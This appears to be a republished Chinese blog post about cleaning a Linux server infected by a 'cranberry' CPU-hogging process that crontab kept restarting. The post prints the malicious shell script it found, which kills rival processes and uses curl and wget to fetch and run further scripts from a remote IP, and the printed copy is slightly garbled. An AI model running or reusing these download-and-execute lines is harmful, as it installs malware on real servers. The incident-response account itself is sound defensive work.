鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 服务器相关 > linux > >

记录徒手解决cranberry病毒的过程推荐

来源:互联网 作者:佚名 时间:2018-03-08 10:57
今天中午测试反馈说线上系统频繁的报502错误,并且响应极慢。 开始怀疑是公司哪位小哥在下载小电影,但打开其他网站都很快。于是继续怀疑难道是业务激增导致带宽被占满了,于是登录监控界面,显示只用了80Mb,带宽也没占满。 发现根本原因 ssh上服务器之后,

今天中午测试反馈说线上系统频繁的报502错误,并且响应极慢。
开始怀疑是公司哪位小哥在下载小电影,但打开其他网站都很快。于是继续怀疑难道是业务激增导致带宽被占满了,于是登录监控界面,显示只用了80Mb,带宽也没占满。

发现根本原因

ssh上服务器之后,本能的执行top命令,返现cranberry进程几乎把cpu吃满了。
记录徒手解决cranberry病毒的过程

于是尝试kill掉进程

kill -9 14465

kill掉之后,cranberry又会立即自动重启。
在紧盯屏幕之后,惊喜的发现crontab进程。于是大喜过望,这哥们会啊。crontab命令教程
于是查看crontab的列表

crontab -l

看到如下命令,会通过定时任务去远程服务器下载脚本。
记录徒手解决cranberry病毒的过程
于是把crontab的列表删掉

crontab -r

然后,以为kill掉cranberry之后,就ok了,谁知道还是自动重启。
那只能耐着性子,把脚本下载下来研究一下了,脚本内容如下:

#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
pkill -f jIuc2ggfCAvYmluL2Jhc2gi
pkill -f lowerv2.sh
pkill -f rootv2.sh
pkill -f sourplum
pkill -f nativesvc
ps aux | awk '{if($3 20.0) print $2}' | while read procid
kill -9 $procid
whoami=$( whoami )
if [ ${whoami}x != "root"x ];then
 curl http://172.96.252.86/lowerv3.sh /tmp/lower.sh
 if [ ! -f "/tmp/lower.sh" ] ;then
 wget -P /tmp/ http://172.96.252.86/lowerv3.sh
 rm /tmp/lower.sh.*
 chmod 777 /tmp/lower.sh
 bash /tmp/lower.sh
 curl http://172.96.252.86/rootv3.sh /etc/root.sh
 if [ ! -f "/etc/root.sh" ] ;then
 wget -O /etc/root.sh http://172.96.252.86/rootv3.sh
 chmod 777 /etc/root.sh
 bash /etc/root.sh
echo "over"

这脚本倒也简单,主要是下载另外一个脚本,到/etc/目录中,名字是root.sh.
于是查看是哪个进程执行了脚本:

[email protected]:[/proc]ps -ef|grep root.sh
root 1541 28244 0 16:19 pts/1 00:00:00 grep root.sh
root 2036 1653 0 11:00 ? 00:00:57 bash /etc/root.sh
root 2080 1544 0 06:00 ? 00:01:21 bash /etc/root.sh
root 6035 5979 0 Jan15 ? 00:13:01 bash /etc/root.sh
root 8659 8156 0 05:00 ? 00:01:24 bash /etc/root.sh
root 9649 9627 0 Jan15 ? 00:07:03 bash /etc/root.sh
root 9979 9731 0 02:00 ? 00:03:12 bash /etc/root.sh
root 11925 11497 0 14:00 ? 00:00:16 bash /etc/root.sh
root 14874 14437 0 Jan15 ? 00:08:55 bash /etc/root.sh
root 14931 14794 0 Jan15 ? 00:12:22 bash /etc/root.sh
root 14935 13330 0 15:00 ? 00:00:00 bash /etc/root.sh
root 15050 14391 0 12:00 ? 00:00:32 bash /etc/root.sh
root 15596 15349 0 Jan15 ? 00:03:46 bash /etc/root.sh

把上边的进程kill掉:

kill -9 2036 2080 6035 8659 9649 9979 11925 14874 14931 14935 15050 15596 16459 17199 19983 20478 20795 21609 21810 23402 24943 25513 27988 28883 29853 31304 31499 32364

然后再kill掉cranberry:

killall -9 cranberry

于是cpu恢复到了正常水平。

cranberry病毒的原理 通过定时去远程下载脚本 通过脚本,执行守护任务, 发现cranberry被kill之后,立即通过crontab启动。
网友评论
<